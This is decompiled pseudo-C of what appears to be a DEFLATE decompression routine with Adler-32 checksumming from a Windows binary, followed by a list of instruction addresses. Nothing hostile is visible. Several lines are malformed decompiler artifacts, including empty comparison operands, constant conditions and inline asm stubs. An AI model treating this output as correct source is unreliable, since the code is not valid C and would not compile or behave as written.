				_t1159 =  *((intOrPtr*)(_t1127 + 0x58));
				_t1136 = _t1092 + _t980;
				r12b = 0xc;
				 *(_t1127 + 0x40) =  *(_t1127 + 0x40) - _t542;
				if (_t979 != _t918) goto 0xf3060208;
				_t1180 =  *((intOrPtr*)(_t1127 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1159 + 0x18)) == 0) goto 0xf305f43b;
				_t596 =  *(_t1127 + 0x38);
				_t1076 =  *((intOrPtr*)(_t1127 + 0xe0));
				_t742 =  >=  ? r14d : _t596 >> 3;
				_t543 = _t1109 * 8;
				_t437 = (_t596 & 0xfffffff8) - _t543;
				 *(_t1127 + 0x38) = _t437;
				_t1194 = _t1191 - __r15 + _t1076 - _t1109;
				if (_t1194 - _t1076 > 0) goto 0xf30613c7;
				_t1195 = _t1194 + _t1180;
				 *(_t1127 + 0x30) =  !(0xffffffff << (_t437 & 0x00000038)) &  *(_t1127 + 0x30) >> (_t596 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1127 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1127 + 0x40) = 0;
				r12b = 0x17;
				_t600 =  *(_t1127 + 0x40) & 0x000001ff;
				 *(_t1127 + 0x40) = _t600;
				r12b = 0x14;
				if (_t600 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t600 - 0x11d > 0) goto 0xf305f43b;
				_t601 =  *(_t918 + 0xf311eee8) & 0x000000ff;
				_t821 = _t601;
				r12b = _t821 == 0;
				 *(_t1127 + 0x44) = _t601;
				 *(_t1127 + 0x40) =  *(0xf311ef08 + _t918 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1127 + 0x3c);
				if (_t821 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1127 + 0xf4)) != 0) goto 0xf305f43b;
				_t1093 = _t1136 + 0xf311ef08;
				_t1038 =  *((intOrPtr*)(_t1127 + 0x1a8));
				_t823 = _t1093 - _t1038;
				if (_t823 > 0) goto 0xf30603b1;
				_t922 = (_t1136 - _t1153 &  *(_t1127 + 0xb8)) - _t1136;
				if (_t823 < 0) goto 0xf3060a9a;
				if (_t922 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t445 =  *(_t1127 + 0x40);
				_t696 =  *(_t1127 + 0x50);
				if (_t445 - 3 > 0) goto 0xf3060605;
				_t603 =  *(_t1127 + 0x38);
				if (_t603 == 0) goto 0xf3060421;
				_t1114 = _t1195;
				if (_t603 - 8 >= 0) goto 0xf3060436;
				if (_t1114 == __r15) goto 0xf3060413;
				_t982 =  *(_t1127 + 0x30) | _t1038 << _t603;
				 *(_t1127 + 0x30) = _t982;
				 *(_t1127 + 0x38) = _t603 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t696;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1114 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1041 = _t982 >> 8;
				 *(_t1127 + 0x30) = _t1041;
				 *(_t1127 + 0x38) = ( *(_t1159 + 0x14) << 8) + 0xfffffff8;
				_t664 =  *(_t1159 + 0x14) << 8;
				_t609 = _t543 & 0x000000ff | _t664;
				 *(_t1159 + 0x14) = _t609;
				 *(_t1127 + 0x40) = _t445 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t696;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t448 = _t609 & 0x000000ff;
				if (_t448 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t744 =  !_t742 & _t664;
				_t1042 = _t1041 >> _t448;
				 *(_t1127 + 0x30) = _t1042;
				 *(_t1127 + 0x38) = _t543;
				 *(_t1127 + 0x40) =  *(_t1127 + 0x40) + _t744;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1127 + 0x30) = _t1042 >> _t448;
				 *(_t1127 + 0x38) = _t543;
				 *(_t1127 + 0x3c) =  *(_t1127 + 0x3c) + ( !_t744 & _t664);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1127 + 0x30) = _t982 >> _t448;
				 *(_t1127 + 0x38) = _t696;
				 *(_t1127 + 0x80) = _t922;
				 *(_t1127 + 0x88) = _t922;
				 *((long long*)(_t1127 + 0x90)) = 0xb;
				_t613 =  *(_t1127 + 0x3c);
				_t923 = _t922 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t613 != 0x10) goto 0xf30606d9;
				if (_t1093 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1127 + 0x30) = _t923 >> 8;
				 *(_t1127 + 0x38) = _t613 + 0xfffffff8;
				 *(_t1127 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t451 =  *(_t1159 + 0x291d) & 0x0000ffff;
				 *(_t1127 + 0x40) = _t451;
				r12b = 0x1e;
				if (_t451 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t451 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1008 =  *((intOrPtr*)(_t1127 + 0x128));
				E000007FE7FEF30F24C0();
				_t1160 =  *((intOrPtr*)(_t1127 + 0x58));
				 *(_t1127 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t923 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1127 + 0x6c);
				if (_t1008 - 1 > 0) goto 0xf3060acc;
				_t617 =  *(_t1127 + 0x38);
				_t456 =  *((short*)(_t1160 + 0x3c + _t923 * 2));
				if (_t456 < 0) goto 0xf3060659;
				if ((_t456 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t457 = _t456 >> 9;
				if (_t617 - _t457 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t617 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t457 - 0x23f > 0) goto 0xf3061218;
				_t459 =  *((short*)(_t1160 + 0x83c + _t923 * 2));
				if (_t459 >= 0) goto 0xf3060690;
				if (_t617 - 0xc >= 0) goto 0xf3060663;
				if (_t459 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1199 = __r15 + 1;
				 *(_t1127 + 0x30) =  *(_t1127 + 0x30) | _t923 << _t617;
				 *(_t1127 + 0x38) = _t1008 + 8;
				_t852 = _t617 - 6;
				if (_t852 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1078 =  *((intOrPtr*)(_t1127 + 0x80 + _t923 * 8)) + (_t982 & 0xffffffff);
				if (_t852 < 0) goto 0xf30613e0;
				if (_t1078 + _t1093 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1078 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1127 + 0x40) =  *(_t1127 + 0x40) + _t696;
				r12b = 0xa;
				_t1161 =  *((intOrPtr*)(_t1127 + 0x58));
				_t1169 =  *((intOrPtr*)(_t1127 + 0x1a0));
				_t1139 =  *((intOrPtr*)(_t1127 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t717 =  *(_t1127 + 0x38);
				 *(_t1127 + 0x68) =  *(_t1127 + 0x3c);
				r9d =  *(_t1127 + 0x44);
				_t929 = __r15 - _t1199;
				r12b = 0xc;
				if (_t929 - 0xe < 0) goto 0xf3060b66;
				if (_t717 - 0x1d > 0) goto 0xf3060794;
				_t930 = _t929 << _t717;
				_t1200 = _t1199 + 4;
				_t620 =  *((short*)(_t1161 + 0x3c + _t930 * 2));
				if (_t620 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t620 - 0x23f > 0) goto 0xf306126f;
				_t860 =  *((short*)(_t1161 + 0x83c +  &(( *(_t1127 + 0xe8))[_t1093]) * 2));
				if (_t860 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t860 < 0) goto 0xf30608a8;
				_t473 =  *((short*)(_t1161 + 0x3c + _t930 * 2));
				if (_t473 < 0) goto 0xf3060820;
				if ((_t473 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t473 - 0x23f > 0) goto 0xf306127b;
				_t475 =  *((short*)(_t1161 + 0x83c + _t930 * 2));
				if (_t475 < 0) goto 0xf3060825;
				_t476 = _t475 & 0x0000ffff;
				_t865 = _t1139 -  *((intOrPtr*)(_t1127 + 0x1a8));
				if (_t865 >= 0) goto 0xf3061284;
				_t720 = _t717 + 0x20;
				 *(_t1169 + _t1139) = bpl;
				_t1010 = _t1139 + 1;
				asm("bt eax, 0x8");
				if (_t865 < 0) goto 0xf30608a3;
				_t1051 =  *((intOrPtr*)(_t1127 + 0x1a8));
				if (_t1010 - _t1051 >= 0) goto 0xf30612a2;
				 *(_t1169 + _t1139 + 1) = _t476;
				if (_t1051 - _t1139 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1141 = _t1010;
				_t478 = _t476 & 0x000001ff;
				if (_t478 == 0x100) goto 0xf3060b5e;
				if (_t478 - 0x11d > 0) goto 0xf3061298;
				if (_t720 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1200 - 3 <= 0) goto 0xf306140a;
				_t1201 = _t1200 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t486 =  *((short*)(_t1161 + 0xdda));
				if (_t486 < 0) goto 0xf3060955;
				if ((_t486 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t486 - 0x23f > 0) goto 0xf306127b;
				_t488 =  *((short*)(_t1161 + 0x15da));
				if (_t488 < 0) goto 0xf306095a;
				_t723 = _t720 + 0x20 - r9d - 0xb;
				if ((_t488 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1127 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1127 + 0x118)) = _t1153;
				if (r9d == 0) goto 0xf3060a01;
				if (_t723 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1201 - 3 <= 0) goto 0xf306140a;
				_t1087 = ((( *(_t1127 + 0x30) | _t930) >> 0x0000000a >> 0xb | __r15 - _t1200 << _t720) >> r9d >> 0xb | 0xffffffff << r9d << _t723) >> r9d;
				_t725 = _t723 + 0x20 - r9d;
				 *(_t1127 + 0x68) = ( !( *_t1201) & _t696) +  *(_t1127 + 0x68);
				r9d =  *(_t1127 + 0x68);
				if (_t1141 - _t1153 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1127 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1127 + 0x70)) = _t1180;
				 *((long long*)(_t1127 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1127 + 0x28)) =  *(_t1127 + 0xb8);
				 *((long long*)(_t1127 + 0x20)) = 0xf311ef68;
				_t1013 = _t1169;
				_t1056 =  *((intOrPtr*)(_t1127 + 0x1a8));
				E000007FE7FEF306148C(_t1013, _t1056, _t1141, _t1153);
				if ( *((intOrPtr*)(_t1127 + 0x1a8)) - _t1141 +  *((intOrPtr*)(_t1127 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1127 + 0x40) = _t725;
				goto 0xf305f43b;
				_t946 =  *(_t1127 + 0xb8);
				 *((long long*)(_t1127 + 0x28)) = _t946;
				 *((long long*)(_t1127 + 0x20)) = _t1013;
				_t1014 =  *((intOrPtr*)(_t1127 + 0x1a0));
				_t497 = E000007FE7FEF306148C(_t1014, _t1056, _t1013,  *((intOrPtr*)(_t1127 + 0x118)));
				_t1163 =  *((intOrPtr*)(_t1127 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t639 = _t497;
				_t1058 = _t1056 << _t639 |  *(_t1127 + 0x30);
				 *(_t1127 + 0x30) = _t1058;
				 *(_t1127 + 0x38) = _t497 + 0x10;
				goto 0xf3060aee;
				_t697 =  *((short*)(_t1163 + 0x3c + _t1014 * 2));
				if (_t697 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t697 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t700 =  *((short*)(_t1163 + 0x83c + _t1087 * 2));
				if (_t700 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1127 + 0x30) = _t1058 >> 0xb;
				 *(_t1127 + 0x38) = _t639 - 0xb;
				 *(_t1127 + 0x40) = _t700 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1127 + 0x30) = _t1087;
				 *(_t1127 + 0x38) = _t725;
				 *(_t1127 + 0x3c) =  *(_t1127 + 0x68);
				 *(_t1127 + 0x40) = 0x100;
				 *(_t1127 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1014 + 8)) = 0xfd;
				 *_t1014 = _t946;
				 *((long long*)(_t1014 + 0x10)) = _t946;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1164 =  *((intOrPtr*)(_t1127 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t503 = r9b & 0xffffffff;
				if (_t503 == 0xfc) goto 0xf3060cbe;
				_t646 =  *(_t1127 + 0x38);
				_t704 =  >=  ? _t503 - r15d + r14d : _t646 >> 3;
				_t506 = _t1087 * 8;
				 *(_t1127 + 0x38) = _t646 - _t506;
				_t1096 =  &(_t1201[1]);
				_t1125 =  *((intOrPtr*)(_t1127 + 0x1b0));
				goto 0xf3060cc0;
				_t1015 =  *((intOrPtr*)(_t1127 + 0x1a8));
				if ( *((intOrPtr*)(_t1127 + 0x70)) != _t1015) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t506 & 0xffffff00 | r12b == 0x00000017);
				_t1148 = _t1015;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1164 + 0x291c) = r12b;
				_t648 =  *(_t1127 + 0x38);
				 *(_t1164 + 8) = _t648;
				 *(_t1164 + 0x24) =  *(_t1127 + 0x3c);
				 *(_t1164 + 0x28) =  *(_t1127 + 0x40);
				 *(_t1164 + 0x2c) =  *(_t1127 + 0x44);
				 *_t1164 =  !(0xffffffff << _t648) &  *(_t1127 + 0x30);
				_t893 =  *(_t1127 + 0x1b8) & 0x00000040;
				if (_t893 != 0) goto 0xf3061169;
				if (_t893 == 0) goto 0xf3061169;
				_t894 = r9b;
				if (_t894 < 0) goto 0xf3061169;
				_t986 = _t1148 - _t1125;
				if (_t894 < 0) goto 0xf306137a;
				 *(_t1127 + 0xb8) = _t1087;
				 *(_t1127 + 0x6c) = r9d;
				if (_t1148 -  *((intOrPtr*)(_t1127 + 0x1a8)) > 0) goto 0xf3061389;
				_t510 =  *(_t1164 + 0x20);
				_t1172 =  *((intOrPtr*)(_t1127 + 0x1a0)) + _t1125;
				_t707 = _t510 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1017 = _t986 & 0xfffffffc;
				 *(_t1127 + 0xf8) = _t986;
				 *(_t1127 + 0x108) = _t986;
				_t955 = _t1017 - 0x3f51f0dfc0;
				 *(_t1127 + 0x50) = _t955;
				r12d = 0x56c0;
				 *(_t1127 + 0xe8) = _t1172;
				 *(_t1127 + 0xd8) = _t1096;
				 *(_t1127 + 0x7c) = _t707;
				 *(_t1127 + 0x100) = _t1017;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t707 * 0x56c0;
				_t1183 = _t1172;
				 *(_t1127 + 0x80) =  *_t1183 & 0x000000ff;
				 *(_t1127 + 0x84) = _t1183[1] & 0x000000ff;
				 *(_t1127 + 0x88) = _t1183[2] & 0x000000ff;
				 *(_t1127 + 0x8c) = _t1183[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1127 + 0xc0 + _t1164 * 4)) =  *((intOrPtr*)(_t1127 + 0xc0 + _t1164 * 4)) +  *((intOrPtr*)(_t1127 + 0x80 + _t1164 * 4));
				_t313 = _t1164 + 1; // 0x1
				if (_t313 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1127 + 0xa0 + _t1096 * 4)) =  *((intOrPtr*)(_t1127 + 0xa0 + _t1096 * 4)) +  *((intOrPtr*)(_t1127 + 0x80 + _t1096 * 4));
				_t323 = _t1096 + 1; // 0x1
				_t898 = _t323 - 4;
				if (_t898 != 0) goto 0xf3060e4c;
				_t956 = _t955 + 0xfffffffc;
				if (_t898 != 0) goto 0xf3060dea;
				_t552 =  *(_t1127 + 0xc0 + _t956 * 4);
				 *(_t1127 + 0xc0 + _t956 * 4) = _t552;
				_t330 = _t956 + 1; // 0x1
				_t987 = _t330;
				_t957 = _t987;
				if (_t987 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1127 + 0xa0 + _t957 * 4)) =  *((intOrPtr*)(_t1127 + 0xa0 + _t957 * 4)) - _t552 * 0xfff1;
				_t337 = _t957 + 1; // 0x1
				if (_t337 != 4) goto 0xf3060ea7;
				_t961 = _t1125 * _t1017 >> 0x2f;
				_t901 = 0x3f51f08900 - __r12;
				if (_t901 >= 0) goto 0xf3060de2;
				_t1207 =  *(_t1127 + 0x108);
				r14d = r14d & 0x00000003;
				_t1151 =  *((intOrPtr*)(_t1127 + 0x58));
				r10d =  *(_t1127 + 0x1b8);
				_t1101 =  *(_t1127 + 0xe8);
				r12d =  *(_t1127 + 0x7c);
				if (_t901 == 0) goto 0xf3060fc8;
				_t1156 = 0x3f51f0dfc0 + _t1101;
				 *(_t1127 + 0x80) =  *_t1156 & 0x000000ff;
				 *(_t1127 + 0x84) = _t1156[1] & 0x000000ff;
				 *(_t1127 + 0x88) = _t1156[2] & 0x000000ff;
				 *(_t1127 + 0x8c) = _t1156[3] & 0x000000ff;
				 *((intOrPtr*)(_t1127 + 0xc0 + _t961 * 4)) =  *((intOrPtr*)(_t1127 + 0xc0 + _t961 * 4)) +  *((intOrPtr*)(_t1127 + 0x80 + _t961 * 4));
				_t361 = _t961 + 1; // 0x1
				_t1065 = _t361;
				_t962 = _t1065;
				if (_t1065 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t677 =  *(_t1127 + 0x80 + _t962 * 4);
				 *((intOrPtr*)(_t1127 + 0xa0 + _t962 * 4)) =  *((intOrPtr*)(_t1127 + 0xa0 + _t962 * 4)) + _t677;
				_t371 = _t962 + 1; // 0x1
				_t1066 = _t371;
				_t963 = _t1066;
				_t903 = _t1066 - 4;
				if (_t903 != 0) goto 0xf3060f9f;
				if (_t903 != 0) goto 0xf3060f41;
				_t678 = _t677 * 0xfff1;
				 *((intOrPtr*)(_t1127 + 0xc0 + _t963 * 4)) =  *((intOrPtr*)(_t1127 + 0xc0 + _t963 * 4)) - _t678;
				_t379 = _t963 + 1; // 0x1
				_t1070 = _t379;
				_t964 = _t1070;
				if (_t1070 != 4) goto 0xf3060fd7;
				r9d =  *(_t1127 + 0x6c);
				 *((intOrPtr*)(_t1127 + 0xa0 + _t964 * 4)) =  *((intOrPtr*)(_t1127 + 0xa0 + _t964 * 4)) - _t678 * 0xfff1;
				_t388 = _t964 + 1; // 0x1
				_t1074 = _t388;
				_t965 = _t1074;
				if (_t1074 != 4) goto 0xf3061019;
				 *(_t1127 + 0xa0 + _t965 * 4) =  *(_t1127 + 0xa0 + _t965 * 4) << 2;
				_t966 = _t965 + 1;
				if (_t966 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1127 + 0xa4)) =  *((intOrPtr*)(_t1127 + 0xa4)) -  *((intOrPtr*)(_t1127 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1127 + 0xa8)) =  ~( *((intOrPtr*)(_t1127 + 0xc8)) +  *((intOrPtr*)(_t1127 + 0xc8))) +  *((intOrPtr*)(_t1127 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1127 + 0xac)) =  *((intOrPtr*)(_t1127 + 0xac)) + _t1074 + _t1074 * 2;
				_t967 = _t966 + 1;
				if (_t967 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1127 + 0x50);
				_t969 = _t967 * _t1125 >> 0x2f;
				_t970 = _t969 + 1;
				if (_t970 != 4) goto 0xf30610e4;
				if (_t1207 == 0) goto 0xf306110b;
				_t658 = r12d +  *((intOrPtr*)(_t1127 + 0xc0 + _t966 * 4)) + ( *(_t1101 +  *(_t1127 + 0x100) + _t970) & 0x000000ff);
				_t768 = (_t510 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1127 + 0xa0 + _t969 * 4)) + _t658;
				if (_t1207 != _t970 + 1) goto 0xf30610fb;
				_t539 = _t768 * 0xfff1;
				_t771 = _t768 - _t539 << 0x00000010 | _t658 - _t658 * 0x0000fff1;
				 *(_t1151 + 0x20) = _t771;
				_t911 = r9b;
				if (_t911 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t911 == 0) goto 0xf306117f;
				r9b = _t771 ==  *((intOrPtr*)(_t1151 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t977 =  *((intOrPtr*)(_t1127 + 0x110));
				 *(_t977 + 8) = r9b;
				 *_t977 =  *((intOrPtr*)(_t1127 + 0xe0)) -  *(_t1127 + 0xb8) + __r15 +  *(_t1127 + 0xd8);
				 *((long long*)(_t977 + 0x10)) = _t1151 - _t1125;
				return _t539;
			}

0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
